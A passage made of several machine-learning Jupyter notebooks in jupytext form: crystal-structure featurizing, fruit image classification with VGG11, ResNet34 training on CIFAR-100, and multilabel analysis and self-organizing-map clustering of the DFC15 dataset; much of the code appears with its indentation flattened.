design_space_structures=all_structures
)
print(coulomb_featurizer)
# Featurize just Fe
fe_feature_vector = coulomb_featurizer.featurize_single(all_structures[0])
print(fe_feature_vector.shape)
# Featurize all structures into a single matrix
feature_matrix = coulomb_featurizer.featurize_multiple(all_structures)
print(feature_matrix.shape)
# +
# Instantiate element property featurizer
element_featurizer = Featurizer(
featurizer_class=ElementProperty,
design_space_structures=all_structures,
preset="matminer"
)
print(element_featurizer)
# -
# Featurize just Fe
fe_feature_vector = element_featurizer.featurize_single(all_structures[0])
print(fe_feature_vector.shape)
# Featurize all structures at once
feature_matrix = element_featurizer.featurize_multiple(all_structures)
print(feature_matrix.shape)
|
examples/learning/featurizing_structures.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/eferos93/sml_project/blob/master/project.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + colab={} colab_type="code" id="zX8mwS7rIp7R"
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.datasets import load_files
import torch.optim as optim
import os
import numpy as np
import time
from PIL import Image
from torchvision.utils import make_grid
from torchvision import datasets,transforms
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
from torch.autograd import Variable
import torchvision
import matplotlib.pyplot as plt
import copy
from glob import glob
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="L0XNZEm-P0sy" outputId="4d2e0acb-5b44-4e98-9b96-f349a03e2774"
# !unzip drive/My\ Drive/5857_1166105_bundle_archive
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="FqowUObxIoTQ" outputId="2e4ce2b8-2a36-4d36-a17e-eb0417ae120c"
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="PSLAUmvLettn" outputId="b5c2682e-0e44-4a67-a292-ab6a20946675"
path = "data/fruits/fruits-360/"
files_training = glob(os.path.join(path,'Training', '*/*.jpg'))
num_images = len(files_training)
print('Number of images in Training file:', num_images)
# + colab={"base_uri": "https://localhost:8080/", "height": 35} colab_type="code" id="VoFm6RmsY2qc" outputId="b46ef783-1f3d-479d-c46b-0e11d071dc85"
os.getcwd()
glob(os.path.join(path,'Training', '*/*.jpg'))
os.path.join(path,'Training', '*/*.jpg')
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="t2XzGpyhZR7S" outputId="0cab7928-6e4f-46f5-89e1-d979f14a196a"
min_images = 1000
im_cnt = []
class_names = []
print('{:18s}'.format('class'), end='')
print('Count:')
print('-' * 24)
for folder in os.listdir(os.path.join(path, 'Training')):
folder_num = len(os.listdir(os.path.join(path,'Training',folder)))
im_cnt.append(folder_num)
class_names.append(folder)
print('{:20s}'.format(folder), end=' ')
print(folder_num)
if (folder_num < min_images):
min_images = folder_num
folder_name = folder
num_classes = len(class_names)
print("\nMinimum images per category:", min_images, 'Category:', folder_name)
print('Average number of Images per Category: {:.0f}'.format(np.array(im_cnt).mean()))
print('Total number of classes: {}'.format(num_classes))
# + colab={} colab_type="code" id="9bQ_dZtRZgDW"
tensor_transform = transforms.Compose([
transforms.ToTensor()
])
all_data = ImageFolder(os.path.join(path, 'Training'), tensor_transform)
# + colab={} colab_type="code" id="B9Kd5shSZizl"
data_loader = torch.utils.data.DataLoader(all_data, batch_size=512, shuffle=True)
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" id="i1PRrOcrZn5h" outputId="141d89c1-0863-4956-fb5a-a2964cae3390"
pop_mean = []
pop_std = []
for i, data in enumerate(data_loader, 0):
numpy_image = data[0].numpy()
batch_mean = np.mean(numpy_image, axis=(0,2,3))
batch_std = np.std(numpy_image, axis=(0,2,3))
pop_mean.append(batch_mean)
pop_std.append(batch_std)
pop_mean = np.array(pop_mean).mean(axis=0)
pop_std = np.array(pop_std).mean(axis=0)
print(pop_mean)
print(pop_std)
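# The statistics above reduce NCHW batches over axes (0, 2, 3), collapsing
# batch, height, and width and leaving one value per channel. A minimal numpy
# sketch with fake data:

```python
import numpy as np

rng = np.random.default_rng(0)
batch = rng.random((4, 3, 8, 8))           # fake NCHW batch: 4 RGB images, 8x8

channel_mean = batch.mean(axis=(0, 2, 3))  # one mean per channel
channel_std = batch.std(axis=(0, 2, 3))    # one std per channel
print(channel_mean.shape, channel_std.shape)  # (3,) (3,)
```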
# + colab={} colab_type="code" id="qhzdLDxDaUCi"
np.random.seed(123)
shuffle = np.random.permutation(num_images)
# + colab={"base_uri": "https://localhost:8080/", "height": 68} colab_type="code" id="BsT9Qe8baXLK" outputId="b2de2687-2bf9-4a93-a170-395d730d2529"
split_val = int(num_images * 0.2)
print('Total number of images:', num_images)
print('Number of valid images after split:',len(shuffle[:split_val]))
print('Number of train images after split:',len(shuffle[split_val:]))
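# The permutation-based split can be illustrated on a tiny hypothetical dataset
# (toy names are used so the real `shuffle`/`split_val` variables stay intact):
# the first 20% of a shuffled index array becomes the validation set and the
# rest the training set.

```python
import numpy as np

rng = np.random.RandomState(123)
toy_n = 10
toy_shuffle = rng.permutation(toy_n)       # a random ordering of indices 0..9

toy_split = int(toy_n * 0.2)               # 20% -> 2 validation indices
valid_idx, train_idx = toy_shuffle[:toy_split], toy_shuffle[toy_split:]
print(len(valid_idx), len(train_idx))      # 2 8
```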
# + colab={} colab_type="code" id="1oXyBqXwcWWJ"
class FruitTrainDataset(Dataset):
def __init__(self, files, shuffle, split_val, class_names, transform=transforms.ToTensor()):
self.shuffle = shuffle
self.class_names = class_names
self.split_val = split_val
self.data = np.array([files[i] for i in shuffle[split_val:]])
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
class FruitValidDataset(Dataset):
def __init__(self, files, shuffle, split_val, class_names, transform=transforms.ToTensor()):
self.shuffle = shuffle
self.class_names = class_names
self.split_val = split_val
self.data = np.array([files[i] for i in shuffle[:split_val]])
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
class FruitTestDataset(Dataset):
def __init__(self, path, class_names, transform=transforms.ToTensor()):
self.class_names = class_names
self.data = np.array(glob(os.path.join(path, '*/*.jpg')))
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
# + colab={} colab_type="code" id="f9iBYr_ycXYk"
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
]),
'Test': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
]),
'valid': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
])
}
train_dataset = FruitTrainDataset(files_training, shuffle, split_val, class_names, data_transforms['train'])
valid_dataset = FruitValidDataset(files_training, shuffle, split_val, class_names, data_transforms['valid'])
test_dataset = FruitTestDataset('/content/fruits-360/Test', class_names, transform=data_transforms['Test'])
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=64, shuffle=True)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=64, shuffle=True)
# + colab={} colab_type="code" id="cNlrIzLjcu84"
dataloaders = {'train': train_loader,
'valid': valid_loader,
'Test': test_loader}
dataset_sizes = {
'train': len(train_dataset),
'valid': len(valid_dataset),
'Test': len(test_dataset)
}
# + colab={} colab_type="code" id="EdD6hoELcz9m"
def imshow(inp, title=None):
"""Imshow for Tensor."""
inp = inp.numpy().transpose((1, 2, 0))
inp = pop_std * inp + pop_mean
inp = np.clip(inp, 0, 1)
plt.imshow(inp)
if title is not None:
plt.title(title)
plt.pause(0.001)
# + colab={"base_uri": "https://localhost:8080/", "height": 306} colab_type="code" id="_pJwqU8Jc2Zh" outputId="066c3776-3420-4317-9346-722f766d9299"
inputs, classes = next(iter(train_loader))
out = make_grid(inputs)
cats = ['' for x in range(len(classes))]
for i in range(len(classes)):
cats[i] = class_names[classes[i].item()]
imshow(out)
print(cats)
# + [markdown] colab_type="text" id="rlnXTcp0c6Rw"
# # Network
# + colab={"base_uri": "https://localhost:8080/", "height": 83, "referenced_widgets": ["304788cedc904dec887ad1df4014925f", "48fe9858dba94bcf8ebda5b0980ab3d5", "c3657cb204de4850b6c3bde07cd355ed", "3ca860ee18a34b11844d9dcaed4c44cf", "2d6ade54451f4a2687da3bdc88e4a863", "<KEY>", "c951a746541e411abce3ef98edc0a273", "8bc11a88008f42c9a0b3e073b7bfcdd8"]} colab_type="code" id="iaH1gKObc9qe" outputId="e29cd82a-95f8-4fc0-b635-a2eebc84be6f"
model = torchvision.models.vgg11(num_classes=num_classes)  # pass as a keyword: vgg11's first positional argument is not the class count
model.to(device)
optimizer = optim.SGD(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
exp_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
# + colab={} colab_type="code" id="dMtnCoBHgFqf"
def train(model, criterion, optimizer, scheduler, num_epochs=30):
    since = time.time()  # keep track of how long training takes
    best_acc = 0.0       # best accuracy rate seen so far (for the validation stage)
    best_model_wts = copy.deepcopy(model.state_dict())  # defined even if validation accuracy never improves
# Loop through the data-set num_epochs times.
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 15)
for phase in ['train', 'valid']:
if phase == 'train':
scheduler.step()
model.train() # This sets the model to training mode
else:
model.eval() # this sets the model to evaluation mode
running_loss = 0.0
running_corrects = 0
# using the dataloaders to load data in batches
for inputs, labels in dataloaders[phase]:
# putting the inputs and labels on cuda (gpu)
inputs = inputs.to(device)
labels = labels.to(device)
# zero the gradient
optimizer.zero_grad()
# if training phase, allow calculating the gradient, but don't allow otherwise
with torch.set_grad_enabled(phase == 'train'):
# get outputs and predictions
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels) # get value of loss function with the current weights
if phase == 'train':
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))
# keep track of the best weights for the validation dataset
if phase == 'valid' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
print()
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best validation Acc: {:4f}'.format(best_acc))
model.load_state_dict(best_model_wts)
return model
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="_68YsD6-gc-o" outputId="69392d1f-dde6-466a-9282-14dce5000ee4"
model = train(model, criterion, optimizer,
exp_scheduler, num_epochs=30)
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="E6L3Y9dWy4dT" outputId="63d11d15-9f6d-4c41-9cf4-19a752b73141"
correct = 0
total = 0
with torch.no_grad():
for images, labels in dataloaders['Test']:
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {:.3f}%'.format(dataset_sizes['Test'],
100 * correct / dataset_sizes['Test']))
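# The accuracy bookkeeping above boils down to an argmax over the class
# dimension followed by an element-wise comparison; a tiny self-contained check:

```python
import torch

# Three samples, four classes: argmax over dim=1 picks the predicted class
outputs = torch.tensor([[0.1, 2.0, 0.3, 0.0],
                        [1.5, 0.2, 0.1, 0.0],
                        [0.0, 0.1, 0.2, 3.0]])
labels = torch.tensor([1, 0, 2])

_, predicted = torch.max(outputs, 1)           # tensor([1, 0, 3])
correct = (predicted == labels).sum().item()   # 2 of 3 match
print(correct / labels.size(0))
```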
|
project/project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Train ResNet34 model
from importlib.util import find_spec
if find_spec("model") is None:
import sys
sys.path.append('..')
import torch.nn.functional as F
import torch
from model.model import Resnet34
from data_loader.data_loaders import Cifar100DataLoader
torch.cuda.is_available()
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
dl = Cifar100DataLoader('../data', 32)
data, target = next(iter(dl))
data.shape, target
model = Resnet34()
model.to(device)
model(data.to(device))
# ### Define Loss function and optimizer
trainable_params = filter(lambda p: p.requires_grad, model.parameters())
criterion = F.cross_entropy
optimizer = torch.optim.SGD(trainable_params, lr=0.01, momentum=0.9)
for epoch in range(10):
running_loss = 0.0
for batch_idx, (data, target) in enumerate(dl):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
running_loss+= loss.item()
        if batch_idx % 200 == 199:    # print every 200 mini-batches
            print('[%d, %5d] loss: %.3f' %
                  (epoch + 1, batch_idx + 1, running_loss / 200))
            running_loss = 0.0
|
notebooks/03_train_resnet34.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Imports
# +
import os
import cv2
import glob
import matplotlib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from minisom import MiniSom
from sklearn.metrics import classification_report, roc_curve, roc_auc_score, r2_score
from sklearn.preprocessing import OneHotEncoder
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.layers import concatenate, Embedding, Input, Flatten
from tensorflow.keras.models import Model
from tensorflow.keras.utils import plot_model
# -
# # Dataset Summary
#
# **Name:** DFC15_multilabel
# +
BASE_DATA_DIR = "/home/jovyan/work/data/"
DATASET_DIR = "DFC15_multilabel"
FULL_DATASET_DIR = os.path.join(BASE_DATA_DIR, DATASET_DIR)
TRAIN_IMAGES_PATH = os.path.join(FULL_DATASET_DIR, "images_tr")
TEST_IMAGES_PATH = os.path.join(FULL_DATASET_DIR, "images_test")
print(f"Dataset in {FULL_DATASET_DIR}")
print(f"Contents of dataset dir is {os.listdir(FULL_DATASET_DIR)}")
# -
multilabel_df = pd.read_csv(os.path.join(FULL_DATASET_DIR, "multilabel.csv"))
multilabel_df.head()
print("Total number of samples: ", multilabel_df.shape[0])
print("Total number of features: ", multilabel_df.shape[1] - 1)
multilabel_df.describe()
multilabel_df.info()
# ## Sample Distributions
print("Number of images in train set:", len(glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png"))))
print("Number of images in test set:", len(glob.glob(os.path.join(TEST_IMAGES_PATH, "*.png"))))
multilabel_df["in_train"] = np.zeros((multilabel_df.shape[0],), dtype=int)
for image_file in glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png")):
basename = os.path.basename(image_file)
image_id = os.path.splitext(basename)[0]
multilabel_df.loc[multilabel_df["image\\label"] == int(image_id), "in_train"] = 1
print("Number of images in train set:", multilabel_df["in_train"].sum())
print("Number of images in test set:", (multilabel_df["in_train"] == 0).sum())
# ## Label Analysis
multilabel_df["total_label_count"] = multilabel_df.drop(["image\\label", "in_train"], axis=1).sum(axis=1)
multilabel_df.head()
# ### Label Count Distribution per Sample
multilabel_df["total_label_count"].describe()
# +
plt_data = multilabel_df.drop(["image\\label", "total_label_count", "in_train"], axis=1).sum(axis=0)
fig, ax = plt.subplots(figsize=(15, 8))
ax.bar(plt_data.index, plt_data.values, color=matplotlib.cm.rainbow(np.linspace(0, 1, 7)))
rects = ax.patches
labels = plt_data.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Label Counts Plot", fontsize=18)
plt.xlabel("Label Name", fontsize=16)
plt.ylabel("Occurrence Count", fontsize=16)
plt.show()
# -
# ### Label Distributions Over Train and Test Sets
multilabel_df[multilabel_df["in_train"] == 1].describe()
multilabel_df[multilabel_df["in_train"] == 0].describe()
# ## Label Correlations
just_labels_df = multilabel_df.drop(["image\\label", "total_label_count", "in_train"], axis=1)
just_labels_df.corr()
# +
fig, ax = plt.subplots(figsize=(8, 8))
ax.xaxis.tick_top()
im = ax.imshow(just_labels_df.corr())
plt.xticks(ticks=np.arange(just_labels_df.shape[1]), labels=just_labels_df.columns)
plt.yticks(ticks=np.arange(just_labels_df.shape[1]), labels=just_labels_df.columns)
cbar = ax.figure.colorbar(im, ax=ax)
cbar.ax.set_ylabel("Pearson Correlation Coef.", rotation=-90, va="bottom")
plt.title("Labels Correlation Plot")
plt.show()
# -
# ## Subset Analysis
total_unique_subsets = multilabel_df.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
# ### Total Number of Unique Subsets
len(total_unique_subsets)
print(f"Number of unique subsets in whole dataset: {len(total_unique_subsets)}")
# ### Total Number of Unique Subsets in Train Set
training_subsets = multilabel_df[multilabel_df["in_train"] == 1] \
.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
print(f"Number of unique subsets in train set: {len(training_subsets)}")
# ### Total Number of Subsets That Do Not Exist in Train Set
print(f"Number of subsets which do not exist in train set: \
{len(set(map(tuple, total_unique_subsets)) - set(map(tuple, training_subsets)))}")
# ### Total Number of Unique Subsets in Test Set
test_subsets = multilabel_df[multilabel_df["in_train"] == 0] \
.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
print(f"Number of unique subsets in test set: {len(test_subsets)}")
# ### Total Number of Subsets That Do Not Exist in Test Set
print(f"Number of subsets which do not exist in test set: \
{len(set(map(tuple, total_unique_subsets)) - set(map(tuple, test_subsets)))}")
# ## Assigning Subsets to the Samples
multilabel_df["subset"] = multilabel_df.drop(["image\\label", "in_train", "total_label_count"], axis=1) \
.apply(lambda x: (x.values.reshape(1, -1) == total_unique_subsets).all(axis=1).nonzero()[0][0], axis=1)
multilabel_df.sample(10)
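The row-matching trick inside the `apply` above — broadcasting one sample's label row against every unique subset and taking the index of the matching row — can be illustrated on a tiny made-up array (the subsets and sample here are hypothetical, not from DFC15):

```python
import numpy as np

# hypothetical unique label subsets (one row per subset)
unique_subsets = np.array([[0, 0, 1],
                           [1, 0, 1],
                           [1, 1, 0]])
# one sample's multi-hot label row
sample = np.array([1, 0, 1])

# broadcast-compare the sample against every subset row;
# .all(axis=1) marks rows that match on every column,
# .nonzero()[0][0] picks the index of the first matching row
subset_id = (sample.reshape(1, -1) == unique_subsets).all(axis=1).nonzero()[0][0]
print(subset_id)  # -> 1
```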
# ### Subset Distribution in the Dataset
# +
subset_value_counts = multilabel_df["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurrence Count", fontsize=16)
plt.show()
# -
# ### Subset Distribution in Train Set
# +
subset_value_counts = multilabel_df[multilabel_df["in_train"] == 1]["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurrence Count", fontsize=16)
plt.show()
# -
# ### Subset Distribution in Test Set
# +
subset_value_counts = multilabel_df[multilabel_df["in_train"] == 0]["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurrence Count", fontsize=16)
plt.show()
# -
# # Feature Extraction
vgg16_network = VGG16(include_top=False,
weights='imagenet',
input_shape=(224, 224, 3),
pooling=None)
# +
resized_raw_train_images = list()
resized_raw_train_labels = list()
for raw_image_file in glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png")):
raw_img = cv2.imread(raw_image_file)
raw_img = cv2.cvtColor(raw_img, cv2.COLOR_BGR2RGB)
resized_raw_img = cv2.resize(raw_img, (224, 224))
resized_raw_train_images.append(resized_raw_img)
resized_raw_train_labels.append(os.path.basename(raw_image_file).split(".")[0])
# -
preprediction_images = np.array(resized_raw_train_images)
preprediction_images.shape
# ## CITF Creation With Word Embedding
#
# **Plan**:
#
# <img src="./Enhanced CITF Vector Creation Plan.png" />
label_sequence_train = multilabel_df[multilabel_df["in_train"] == 1] \
.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
label_sequence_train.shape
label_sequence_test = multilabel_df[multilabel_df["in_train"] == 0] \
.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
label_sequence_test.shape
# +
embeddings_index = {}
with open('glove/glove.6B.100d.txt') as f:
for line in f:
word, coefs = line.split(maxsplit=1)
coefs = np.fromstring(coefs, 'f', sep=' ')
embeddings_index[word] = coefs
print('Found %s word vectors.' % len(embeddings_index))
# +
embedding_matrix = np.zeros((9, 100))
for i, word in enumerate(just_labels_df.columns):
embedding_vector = embeddings_index.get(word)
# words not found in the embedding index remain all-zeros
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
# +
vis_input = Input(shape=(224, 224, 3))
seq_input = Input(shape=(8,), dtype="int32")
vgg16_model = VGG16(include_top=False,
weights='imagenet',
input_shape=(224, 224, 3),
input_tensor=vis_input,
pooling=None)
vgg16_model_output = Flatten()(vgg16_model.outputs[0])
embedding_layer = Embedding(9, 100, weights=[embedding_matrix], input_length=8, trainable=False)
embedded_sequences = embedding_layer(seq_input)
embedded_sequences = Flatten()(embedded_sequences)
output = concatenate([vgg16_model_output, embedded_sequences], axis=1)
model = Model(inputs=[vis_input, seq_input], outputs=output)
# -
plot_model(model, show_shapes=True)
def create_word_vecs(labels):
result_list = list()
for idx, label in enumerate(labels):
if label == 1:
will_be_added = np.zeros_like(labels, dtype="int32")
will_be_added[idx] = 1
result_list.append(will_be_added)
return np.array(result_list)
def create_prediction_seqs(tags):
result = np.zeros_like(tags, dtype="int32")
for idx, labels in enumerate(tags):
nonzero_indices = labels.nonzero()[0]
index_count = 0
for idx2, label in enumerate(labels):
if label == 1:
result[idx][idx2] = nonzero_indices[index_count]
index_count += 1
if index_count == len(nonzero_indices):
break
return result
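For intuition, `create_prediction_seqs` replaces each 1 in a multi-hot label row with the column index where it occurs, leaving zeros elsewhere. A self-contained check on a tiny made-up row (the function body is restated verbatim from the cell above so the snippet runs on its own):

```python
import numpy as np

def create_prediction_seqs(tags):
    # replace every 1 in a multi-hot row with its own column index
    result = np.zeros_like(tags, dtype="int32")
    for idx, labels in enumerate(tags):
        nonzero_indices = labels.nonzero()[0]
        index_count = 0
        for idx2, label in enumerate(labels):
            if label == 1:
                result[idx][idx2] = nonzero_indices[index_count]
                index_count += 1
                if index_count == len(nonzero_indices):
                    break
    return result

# a sample tagged with labels 1 and 3 keeps zeros elsewhere
seqs = create_prediction_seqs(np.array([[0, 1, 0, 1]]))
print(seqs)  # -> [[0 1 0 3]]
```

Note that positions 0 and 2 stay 0, which is indistinguishable from "label 0 present" — these sequences only work here because index 0 is fed to a fixed (non-trainable) embedding alongside the image features.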
filtered_idx = multilabel_df["in_train"] == 1
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
prediction_tags = create_prediction_seqs(tags)
prediction_tags.shape
preprediction_images.shape
ecitf_vector = model.predict([preprediction_images, prediction_tags])
ecitf_vector.shape
# ## CITF Creation Without Word Embedding
postprediction_features = vgg16_network.predict(preprediction_images)
postprediction_features.shape
flattened_postprediction_features = postprediction_features.reshape(postprediction_features.shape[0], -1)
# +
citf_vector = list()
citf_vector_train_test = list()
for flattened_postprediction_feature, image_id in zip(flattened_postprediction_features, resized_raw_train_labels):
filtered_idx = multilabel_df["image\\label"] == int(image_id)
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values[0]
citf_vector.append(np.concatenate((flattened_postprediction_feature, tags)))
citf_vector_train_test.append(np.concatenate((flattened_postprediction_feature, np.zeros_like(tags))))
citf_vector = np.array(citf_vector)
citf_vector_train_test = np.array(citf_vector_train_test)
# -
flattened_postprediction_features.shape
citf_vector.shape
# # Clustering
# ## Clustering With Word Embedding
som_embed = MiniSom(20, 20, ecitf_vector.shape[1],
sigma=5.0,
learning_rate=0.7,
topology="hexagonal",
activation_distance="cosine")
som_embed.random_weights_init(ecitf_vector)
som_embed.train_random(ecitf_vector, 1500, verbose=True)
# ## Clustering Without Word Embedding
som = MiniSom(16, 16, citf_vector.shape[1],
sigma=3.0,
learning_rate=0.7,
topology="hexagonal",
activation_distance="cosine")
som.random_weights_init(citf_vector)
som.train_random(citf_vector, 1000, verbose=True)
# # Scoring
#
# ## With Train Set
# **Threshold = 0.5**
y_pred = list()
for x in citf_vector_train_test:
winner_coords = som.winner(x)
y_pred.append(som.get_weights()[winner_coords][-8:])
y_pred = np.array(y_pred)
y_pred.shape
y_test = citf_vector[:, -8:]
y_test.shape
y_pred_tresholded = (y_pred >= 0.5).astype(int)
labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test, y_pred_tresholded, target_names=labels))
# +
fig, ax = plt.subplots(figsize=(15, 8))
for i in range(len(labels)):
fpr, tpr, thresholds = roc_curve(y_test[:, i], y_pred[:, i])
auc = roc_auc_score(y_test[:, i], y_pred[:, i])
ax.plot(fpr, tpr, label=labels[i] + f" (AUC: {auc:.2f})")
plt.xlabel("FPR")
plt.ylabel("TPR")
plt.title("ROC Curve")
plt.legend()
plt.show()
# -
# ## With Test Set
#
# **Threshold = 0.5**
# +
resized_raw_test_images = list()
resized_raw_test_labels = list()
for raw_image_file in glob.glob(os.path.join(TEST_IMAGES_PATH, "*.png")):
raw_img = cv2.imread(raw_image_file)
raw_img = cv2.cvtColor(raw_img, cv2.COLOR_BGR2RGB)
resized_raw_img = cv2.resize(raw_img, (224, 224))
resized_raw_test_images.append(resized_raw_img)
resized_raw_test_labels.append(os.path.basename(raw_image_file).split(".")[0])
# -
preprediction_images_test = np.array(resized_raw_test_images)
preprediction_images_test.shape
# ### With Word Embedding
filtered_idx = multilabel_df["in_train"] == 0
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
prediction_tags_test = create_prediction_seqs(tags)
prediction_tags_test.shape
preprediction_images_test.shape
ecitf_vector_test = model.predict([preprediction_images_test, np.zeros_like(prediction_tags_test)])
ecitf_vector_test.shape
y_pred = list()
for x in ecitf_vector_test:
winner_coords = som_embed.winner(x)
y_pred.append(som_embed.get_weights()[winner_coords][-100:])
y_pred = np.array(y_pred)
y_true = model.predict([preprediction_images_test, prediction_tags_test])
y_true = y_true[:, -100:]
y_pred.shape
y_true.shape
r2_score(y_true, y_pred)
# ### Without Word Embedding
postprediction_features_test = vgg16_network.predict(preprediction_images_test)
postprediction_features_test.shape
flattened_postprediction_features_test = postprediction_features_test.reshape(postprediction_features_test.shape[0], -1)
# +
citf_vector_test = list()
y_test = list()
y_test_subset = list()
for flattened_postprediction_feature, image_id in zip(flattened_postprediction_features_test, resized_raw_test_labels):
filtered_idx = multilabel_df["image\\label"] == int(image_id)
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values[0]
subset = multilabel_df[filtered_idx]["subset"].values[0]
y_test.append(tags)
y_test_subset.append(subset)
citf_vector_test.append(np.concatenate((flattened_postprediction_feature, np.zeros_like(tags))))
citf_vector_test = np.array(citf_vector_test)
y_test = np.array(y_test)
y_test_subset = np.array(y_test_subset)
# -
citf_vector_test[:, -8:]
y_pred = list()
for x in citf_vector_test:
winner_coords = som.winner(x)
y_pred.append(som.get_weights()[winner_coords][-8:])
y_pred = np.array(y_pred)
y_pred.shape
y_test.shape
y_test_subset.shape
y_pred_tresholded = (y_pred >= 0.5).astype(int)
# #### Subset Results
y_pred_subset = list()
for x in y_pred_tresholded:
if (x.reshape(1, -1) == total_unique_subsets).all(axis=1).any():
y_pred_subset.append((x.reshape(1, -1) == total_unique_subsets).all(axis=1).nonzero()[0][0])
else:
